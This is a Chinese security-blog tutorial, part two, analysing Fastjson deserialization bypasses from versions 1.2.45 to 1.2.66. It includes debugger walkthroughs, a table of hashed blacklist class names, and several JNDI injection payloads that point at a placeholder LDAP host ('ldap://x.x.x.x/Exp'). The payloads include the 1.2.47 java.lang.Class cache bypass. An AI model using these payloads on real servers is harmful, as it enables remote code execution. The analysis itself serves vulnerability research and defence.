【创宇小课堂】渗透测试-Fastjson各版本漏洞分析(下)

admin 2022年4月23日03:22:34安全文章评论8 views13823字阅读46分4秒阅读模式

- fastjson 1.2.45 -


1.2.44中对[进行了判断,我们用1.2.43的POC,然后下个JSONException的异常断点,看看是怎么判断的

运行后,在com.alibaba.fastjson.parser.ParserConfig#checkAutoType(java.lang.String, java.lang.Class, int)成功拦截

分析一下,发现如果开头是[就直接抛出异常

【创宇小课堂】渗透测试-Fastjson各版本漏洞分析(下)


那再看看1.2.41里面的绕法呢,前面加个L,后面加个;,发现会检查结尾是否为;,是的话也抛出异常
【创宇小课堂】渗透测试-Fastjson各版本漏洞分析(下)
当然这个版本既然有RCE,肯定不是之前的方法绕过的,这次是通过不在黑名单里面的类来绕过的
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://x.x.x.x/Exp"}}


- fastjson 1.2.47 -


这个版本绕过了autoTypeSupport检测,不开启ast依然可以利用(1.2.25 - 1.2.45 这些绕过都是需要开启ast的)
Payload:
{
    "a":
    {
        "@type":"java.lang.Class",
        "val":"org.example.User"
    },
    "b":
    {
        "@type":"org.example.User",
        "username":"123456",
        "age":123
    }
}
【创宇小课堂】渗透测试-Fastjson各版本漏洞分析(下)

绕过原理:
1.利用到了java.lang.class,这个类不在黑名单,所以checkAutotype可以过
2.这个java.lang.class类对应的deserializer为MiscCodec,deserialize时会取json串中的val值并load这个val对应的class,如果fastjson cache为true,就会缓存这个val对应的class到全局map中
3.如果再次加载val名称的class,并且autotype没开启(因为开启了会先检测黑白名单,所以这个漏洞开启了反而不成功),下一步就是会尝试从全局map中获取这个class,如果获取到了,直接返回
debug分析:
setXXX的地方下断点,运行看下调用堆栈信息
setUsername:28, User (org.example)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
setValue:110, FieldDeserializer (com.alibaba.fastjson.parser.deserializer)
parseField:124, DefaultFieldDeserializer (com.alibaba.fastjson.parser.deserializer)
parseField:1078, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer)
deserialze:773, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer)
deserialze:271, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer)
deserialze:267, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer)
parseObject:384, DefaultJSONParser (com.alibaba.fastjson.parser)
parseObject:544, DefaultJSONParser (com.alibaba.fastjson.parser)
parse:1356, DefaultJSONParser (com.alibaba.fastjson.parser)
parse:1322, DefaultJSONParser (com.alibaba.fastjson.parser)
parse:152, JSON (com.alibaba.fastjson)
parse:162, JSON (com.alibaba.fastjson)
parse:131, JSON (com.alibaba.fastjson)
parseObject:223, JSON (com.alibaba.fastjson)
main:20, App (org.example)

进入到parse:1356, DefaultJSONParser (com.alibaba.fastjson.parser)开始下断点重新运行分析
【创宇小课堂】渗透测试-Fastjson各版本漏洞分析(下)

跟进,一直F8,识别到传入的参数a,继续向下,识别到后面还是{开头后,递归调用parseObject
【创宇小课堂】渗透测试-Fastjson各版本漏洞分析(下)

继续往后识别到@type
【创宇小课堂】渗透测试-Fastjson各版本漏洞分析(下)

然后就是进入checkAutoType检查,因为java.lang.Classthis.deserializers.buckets里面,所以直接返回了class java.lang.Class
【创宇小课堂】渗透测试-Fastjson各版本漏洞分析(下)

通过了checkAutoType检查后,常规调用deserializer.deserialze进行反序列化,但这里是com.alibaba.fastjson.serializer.MiscCodec#deserialze
【创宇小课堂】渗透测试-Fastjson各版本漏洞分析(下)

这里会取出我们的变量val的值,也是我们传入的恶意类
【创宇小课堂】渗透测试-Fastjson各版本漏洞分析(下)

然后就是一系列的Class的判断,一直到Class.class,然后会进入loadClass
【创宇小课堂】渗透测试-Fastjson各版本漏洞分析(下)

跟进loadClass,一直跟,发现在cachetrue的时候,会直接给咱们的恶意类加入到mappings中,而这个mappings是不是看着很眼熟?后面分析
【创宇小课堂】渗透测试-Fastjson各版本漏洞分析(下)

这个cache默认就是为true
【创宇小课堂】渗透测试-Fastjson各版本漏洞分析(下)

【创宇小课堂】渗透测试-Fastjson各版本漏洞分析(下)
然后开始处理字段b,和上面类似,我们一直到checkAutoType
可以看到此处如果开启了autoTypeSupport检查会进入黑名单检查,反而影响我们的payload
【创宇小课堂】渗透测试-Fastjson各版本漏洞分析(下)

跟进下方的getClassFromMapping,可以看到就是上面我们添加恶意类的那个Mapping,从此绕过了checkAutoType检查
【创宇小课堂】渗透测试-Fastjson各版本漏洞分析(下)

到此差不多就结束了,大佬就是大佬,太牛了

- fastjson 1.2.62 -


1.2.47后肯定修复了,怎么修的呢?我们用1.2.62去试试1.2.47的POC
【创宇小课堂】渗透测试-Fastjson各版本漏洞分析(下)

抛出了一场,然后下个异常断点,分析一下,看样子是前面某个地方设置了autoTypeSupport的值
【创宇小课堂】渗透测试-Fastjson各版本漏洞分析(下)

咱们追踪一下这个变量,下个字段断点
【创宇小课堂】渗透测试-Fastjson各版本漏洞分析(下)

发现来源是这
【创宇小课堂】渗透测试-Fastjson各版本漏洞分析(下)

跟一下AUTO_SUPPORT,原来是从配置文件里面读是否开启了autoTypeSupport。。。大意了
【创宇小课堂】渗透测试-Fastjson各版本漏洞分析(下)

那我们开启ast后再试试
结果就是java.lang.Class被加入到了黑名单
【创宇小课堂】渗透测试-Fastjson各版本漏洞分析(下)

据说修复还将cache默认设置为false了,去TypeUtils类看看,发现确实如此
【创宇小课堂】渗透测试-Fastjson各版本漏洞分析(下)
1.2.62的RCE也很简单,由于CVE-2020-8840的gadget绕过了fastjson的黑名单而导致的,当服务端存在收到漏洞影响的xbean-reflect依赖并且开启fastjson的autotype时,远程攻击者可以通过精心构造的请求包触发漏洞从而导致在服务端上造成远程命令执行的效果。

{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://x.x.x.x/Exp"}

- fastjson 1.2.66 -


和1.2.62类似,在开启AutoType的情况下,由于黑名单过滤不全而导致的绕过问题
{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://x.x.x.x/Exp"}

- fastjson黑名单 -


参考https://github.com/LeadroyaL/fastjson-blacklist
fastjson 在1.2.42开始,把原本明文的黑名单改成了哈希过的黑名单,防止安全研究者对其进行研究。在 https://github.com/alibaba/fastjson/commit/eebea031d4d6f0a079c3d26845d96ad50c3aaccd 这次commit中体现出来。
fastjson 在1.2.61开始,在https://github.com/alibaba/fastjson/commit/d1c0dff9a33d49e6e7b98a4063da01bbc9325a38中,把黑名单从十进制数变成了十六进制数,可能是为了防止安全研究者进行搜索
对照表
version
hash
hex-hash
name
1.2.42
-8720046426850100497
0x86fc2bf9beaf7aefL
org.apache.commons.collections4.comparators
1.2.42
-8109300701639721088
0x8f75f9fa0df03f80L
org.python.core
1.2.42
-7966123100503199569
0x9172a53f157930afL
org.apache.tomcat
1.2.42
-7766605818834748097
0x9437792831df7d3fL
org.apache.xalan
1.2.42
-6835437086156813536
0xa123a62f93178b20L
javax.xml
1.2.42
-4837536971810737970
0xbcdd9dc12766f0ceL
org.springframework.
1.2.42
-4082057040235125754
0xc7599ebfe3e72406L
org.apache.commons.beanutils
1.2.42
-2364987994247679115
0xdf2ddff310cdb375L
org.apache.commons.collections.Transformer
1.2.42
-1872417015366588117
0xe603d6a51fad692bL
org.codehaus.groovy.runtime
1.2.42
-254670111376247151
0xfc773ae20c827691L
java.lang.Thread
1.2.42
-190281065685395680
0xfd5bfc610056d720L
javax.net.
1.2.42
313864100207897507
0x45b11bc78a3aba3L
com.mchange
1.2.42
1203232727967308606
0x10b2bdca849d9b3eL
org.apache.wicket.util
1.2.42
1502845958873959152
0x14db2e6fead04af0L
java.util.jar.
1.2.42
3547627781654598988
0x313bb4abd8d4554cL
org.mozilla.javascript
1.2.42
3730752432285826863
0x33c64b921f523f2fL
java.rmi
1.2.42
3794316665763266033
0x34a81ee78429fdf1L
java.util.prefs.
1.2.42
4147696707147271408
0x398f942e01920cf0L
com.sun.
1.2.42
5347909877633654828
0x4a3797b30328202cL
java.util.logging.
1.2.42
5450448828334921485
0x4ba3e254e758d70dL
org.apache.bcel
1.2.42
5751393439502795295
0x4fd10ddc6d13821fL
java.net.Socket
1.2.42
5944107969236155580
0x527db6b46ce3bcbcL
org.apache.commons.fileupload
1.2.42
6742705432718011780
0x5d92e6ddde40ed84L
org.jboss
1.2.42
7179336928365889465
0x63a220e60a17c7b9L
org.hibernate
1.2.42
7442624256860549330
0x6749835432e0f0d2L
org.apache.commons.collections.functors
1.2.42
8838294710098435315
0x7aa7ee3627a19cf3L
org.apache.myfaces.context.servlet
1.2.43
-2262244760619952081
0xe09ae4604842582fL
java.net.URL
1.2.46
-8165637398350707645
0x8eadd40cb2a94443L
junit.
1.2.46
-8083514888460375884
0x8fd1960988bce8b4L
org.apache.ibatis.datasource
1.2.46
-7921218830998286408
0x92122d710e364fb8L
org.osjava.sj.
1.2.46
-7768608037458185275
0x94305c26580f73c5L
org.apache.log4j.
1.2.46
-6179589609550493385
0xaa3daffdb10c4937L
org.logicalcobwebs.
1.2.46
-5194641081268104286
0xb7e8ed757f5d13a2L
org.apache.logging.
1.2.46
-3935185854875733362
0xc963695082fd728eL
org.apache.commons.dbcp
1.2.46
-2753427844400776271
0xd9c9dbf6bbd27bb1L
com.ibatis.sqlmap.engine.datasource
1.2.46
-1589194880214235129
0xe9f20bad25f60807L
org.jdom.
1.2.46
1073634739308289776
0xee6511b66fd5ef0L
org.slf4j.
1.2.46
5688200883751798389
0x4ef08c90ff16c675L
javassist.
1.2.46
7017492163108594270
0x616323f12c2ce25eL
oracle.net
1.2.46
8389032537095247355
0x746bd4a53ec195fbL
org.jaxen.
1.2.48
1459860845934817624
0x144277b467723158L
java.net.InetAddress
1.2.48
8409640769019589119
0x74b50bb9260e31ffL
java.lang.Class
1.2.49
4904007817188630457
0x440e89208f445fb9L
com.alibaba.fastjson.annotation
1.2.59
5100336081510080343
0x46c808a4b5841f57L
org.apache.cxf.jaxrs.provider.
1.2.59
6456855723474196908
0x599b5c1213a099acL
ch.qos.logback.
1.2.59
8537233257283452655
0x767a586a5107feefL
net.sf.ehcache.transaction.manager.
1.2.60
3688179072722109200
0x332f0b5369a18310L
com.zaxxer.hikari.
1.2.61
-4401390804044377335
0xc2eb1e621f439309L
flex.messaging.util.concurrent.AsynchBeansWorkManagerExecutor
1.2.61
-1650485814983027158
0xe9184be55b1d962aL
org.apache.openjpa.ee.
1.2.61
-1251419154176620831
0xeea210e8da2ec6e1L
oracle.jdbc.rowset.OracleJDBCRowSet
1.2.61
-9822483067882491
0xffdd1a80f1ed3405L
com.mysql.cj.jdbc.admin.
1.2.61
99147092142056280
0x1603dc147a3e358L
oracle.jdbc.connector.OracleManagedConnectionFactory
1.2.61
3114862868117605599
0x2b3a37467a344cdfL
org.apache.ibatis.parsing.
1.2.61
4814658433570175913
0x42d11a560fc9fba9L
org.apache.axis2.jaxws.spi.handler.
1.2.61
6511035576063254270
0x5a5bd85c072e5efeL
jodd.db.connection.
1.2.61
8925522461579647174
0x7bddd363ad3998c6L
org.apache.commons.configuration.JNDIConfiguration
1.2.62
-9164606388214699518
0x80d0c70bcc2fea02L
org.apache.ibatis.executor.
1.2.62
-8649961213709896794
0x87f52a1b07ea33a6L
net.sf.cglib.
1.2.62
-6316154655839304624
0xa85882ce1044c450L
oracle.net.
1.2.62
-5764804792063216819
0xafff4c95b99a334dL
com.mysql.cj.jdbc.MysqlDataSource
1.2.62
-4608341446948126581
0xc00be1debaf2808bL
jdk.internal.
1.2.62
-4438775680185074100
0xc2664d0958ecfe4cL
aj.org.objectweb.asm.
1.2.62
-3319207949486691020
0xd1efcdf4b3316d34L
oracle.jdbc.
1.2.62
-2192804397019347313
0xe1919804d5bf468fL
org.apache.commons.collections.comparators.
1.2.62
-2095516571388852610
0xe2eb3ac7e56c467eL
net.sf.ehcache.hibernate.
1.2.62
4750336058574309
0x10e067cd55c5e5L
com.mysql.cj.log.
1.2.62
218512992947536312
0x3085068cb7201b8L
org.h2.jdbcx.
1.2.62
823641066473609950
0xb6e292fa5955adeL
org.apache.commons.logging.
1.2.62
1534439610567445754
0x154b6cb22d294cfaL
org.apache.ibatis.reflection.
1.2.62
1818089308493370394
0x193b2697eaaed41aL
org.h2.server.
1.2.62
2164696723069287854
0x1e0a8c3358ff3daeL
org.apache.ibatis.datasource.
1.2.62
2653453629929770569
0x24d2f6048fef4e49L
org.objectweb.asm.
1.2.62
2836431254737891113
0x275d0732b877af29L
flex.messaging.util.concurrent.
1.2.62
3089451460101527857
0x2adfefbbfe29d931L
org.apache.ibatis.javassist.
1.2.62
3256258368248066264
0x2d308dbbc851b0d8L
java.lang.UNIXProcess
1.2.62
3718352661124136681
0x339a3e0b6beebee9L
org.apache.ibatis.ognl.
1.2.62
4046190361520671643
0x3826f4b2380c8b9bL
com.mysql.cj.jdbc.MysqlConnectionPoolDataSource
1.2.62
4841947709850912914
0x43320dc9d2ae0892L
org.codehaus.jackson.
1.2.62
6280357960959217660
0x5728504a6d454ffcL
org.apache.ibatis.scripting.
1.2.62
6534946468240507089
0x5ab0cb3071ab40d1L
org.apache.commons.proxy.
1.2.62
6734240326434096246
0x5d74d3e5b9370476L
com.mysql.cj.jdbc.MysqlXADataSource
1.2.62
7123326897294507060
0x62db241274397c34L
org.apache.commons.collections.functors.
1.2.62
8488266005336625107
0x75cc60f5871d0fd3L
org.apache.commons.configuration
1.2.66
-2439930098895578154
0xde23a0809a8b9bd6L
javax.script.
1.2.66
-582813228520337988
0xf7e96e74dfa58dbcL
javax.sound.
1.2.66
-26639035867733124
0xffa15bf021f1e37cL
javax.print.
1.2.66
386461436234701831
0x55cfca0f2281c07L
javax.activation.
1.2.66
1153291637701043748
0x100150a253996624L
javax.tools.
1.2.66
1698504441317515818L
0x17924cca5227622aL
javax.management.
1.2.66
7375862386996623731L
0x665c53c311193973L
org.apache.xbean.
1.2.66
7658177784286215602L
0x6a47501ebb2afdb2L
org.eclipse.jetty.
1.2.66
8055461369741094911L
0x6fcabf6fa54cafffL
javax.naming.
1.2.67
-7775351613326101303L
0x941866e73beff4c9L
org.apache.shiro.realm.
1.2.67
-6025144546313590215L
0xac6262f52c98aa39L
org.apache.http.conn.
1.2.67
-5939269048541779808L
0xad937a449831e8a0L
org.quartz.
1.2.67
-5885964883385605994L
0xae50da1fad60a096L
com.taobao.eagleeye.wrapper
1.2.67
-3975378478825053783L
0xc8d49e5601e661a9L
org.apache.http.impl.
1.2.67
-2378990704010641148L
0xdefc208f237d4104L
com.ibatis.
1.2.67
-905177026366752536L
0xf3702a4a5490b8e8L
org.apache.catalina.
1.2.67
2660670623866180977L
0x24ec99d5e7dc5571L
org.apache.http.auth.
1.2.67
2731823439467737506L
0x25e962f1c28f71a2L
br.com.anteros.
1.2.67
3637939656440441093L
0x327c8ed7c8706905L
com.caucho.
1.2.67
4254584350247334433L
0x3b0b51ecbf6db221L
org.apache.http.cookie.
1.2.67
5274044858141538265L
0x49312bdafb0077d9L
org.javasimon.
1.2.67
5474268165959054640L
0x4bf881e49d37f530L
org.apache.cocoon.
1.2.67
5596129856135573697L
0x4da972745feb30c1L
org.apache.activemq.jms.pool.
1.2.67
6854854816081053523L
0x5f215622fb630753L
org.mortbay.jetty.
1.2.68
-3077205613010077203L
0xd54b91cc77b239edL
org.apache.shiro.jndi.
1.2.68
-2825378362173150292L
0xd8ca3d595e982bacL
org.apache.ignite.cache.jta.
1.2.68
2078113382421334967L
0x1cd6f11c6a358bb7L
javax.swing.J
1.2.68
6007332606592876737L
0x535e552d6f9700c1L
org.aoju.bus.proxy.provider.
1.2.68
9140390920032557669L
0x7ed9311d28bf1a65L
java.awt.p
1.2.68
9140416208800006522L
0x7ed9481d28bf417aL
java.awt.i
1.2.69
-8024746738719829346L
0x90a25f5baa21529eL
java.io.Serializable
1.2.69
-5811778396720452501L
0xaf586a571e302c6bL
java.io.Closeable
1.2.69
-3053747177772160511L
0xd59ee91f0b09ea01L
oracle.jms.AQ
1.2.69
-2114196234051346931L
0xe2a8ddba03e69e0dL
java.util.Collection
1.2.69
-2027296626235911549L
0xe3dd9875a2dc5283L
java.lang.Iterable
1.2.69
-2939497380989775398L
0xd734ceb4c3e9d1daL
java.lang.Object
1.2.69
-1368967840069965882L
0xed007300a7b227c6L
java.lang.AutoCloseable
1.2.69
2980334044947851925L
0x295c4605fd1eaa95L
java.lang.Readable
1.2.69
3247277300971823414L
0x2d10a5801b9d6136L
java.lang.Cloneable
1.2.69
5183404141909004468L
0x47ef269aadc650b4L
java.lang.Runnable
1.2.69
7222019943667248779L
0x6439c4dff712ae8bL
java.util.EventListener
1.2.70
-5076846148177416215L
0xb98b6b5396932fe9L
org.apache.commons.collections4.Transformer
1.2.70
-4703320437989596122L
0xbeba72fb1ccba426L
org.apache.commons.collections4.functors
1.2.70
-4314457471973557243L
0xc41ff7c9c87c7c05L
org.jdom2.transform.
1.2.70
-2533039401923731906L
0xdcd8d615a6449e3eL
org.apache.hadoop.shaded.com.zaxxer.hikari.
1.2.70
156405680656087946L
0x22baa234c5bfb8aL
com.p6spy.engine.
1.2.70
1214780596910349029L
0x10dbc48446e0dae5L
org.apache.activemq.pool.
1.2.70
3085473968517218653L
0x2ad1ce3a112f015dL
org.apache.aries.transaction.
1.2.70
3129395579983849527L
0x2b6dd8b3229d6837L
org.apache.activemq.ActiveMQConnectionFactory
1.2.70
4241163808635564644L
0x3adba40367f73264L
org.apache.activemq.spring.
1.2.70
7240293012336844478L
0x647ab0224e149ebeL
org.apache.activemq.ActiveMQXAConnectionFactory
1.2.70
7347653049056829645L
0x65f81b84c1d920cdL
org.apache.commons.jelly.
1.2.70
7617522210483516279L
0x69b6e0175084b377L
org.apache.axis2.transport.jms.
1.2.71
-4537258998789938600L
0xc1086afae32e6258L
java.io.FileReader
1.2.71
-4150995715611818742L
0xc664b363baca050aL
java.io.ObjectInputStream
1.2.71
-2995060141064716555L
0xd66f68ab92e7fef5L
java.io.FileInputStream
1.2.71
-965955008570215305L
0xf2983d099d29b477L
java.io.ObjectOutputStream
1.2.71
-219577392946377768L
0xfcf3e78644b98bd8L
java.io.DataOutputStream
1.2.71
2622551729063269307L
x24652ce717e713bbL
java.io.PrintWriter
1.2.71
2930861374593775110L
0x28ac82e44e933606L
java.io.Buffered
1.2.71
4000049462512838776L
0x378307cb0111e878L
java.io.InputStreamReader
1.2.71
4193204392725694463L
0x3a31412dbb05c7ffL
java.io.OutputStreamWriter
1.2.71
5545425291794704408L
0x4cf54eec05e3e818L
java.io.FileWriter
1.2.71
6584624952928234050L
0x5b6149820275ea42L
java.io.FileOutputStream
1.2.71
7045245923763966215L
0x61c5bdd721385107L
java.io.DataInputStream

参考链接

Fastjson系列三——历史版本补丁绕过(需开启AutoType)
Fastjson反序列化漏洞分析
Fastjson 反序列化漏洞史
FastJson 反序列化学习
【创宇小课堂】渗透测试-Fastjson各版本漏洞分析(下)

原文始发于微信公众号(安全宇宙):【创宇小课堂】渗透测试-Fastjson各版本漏洞分析(下)

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月23日03:22:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【创宇小课堂】渗透测试-Fastjson各版本漏洞分析(下) http://cn-sec.com/archives/915796.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: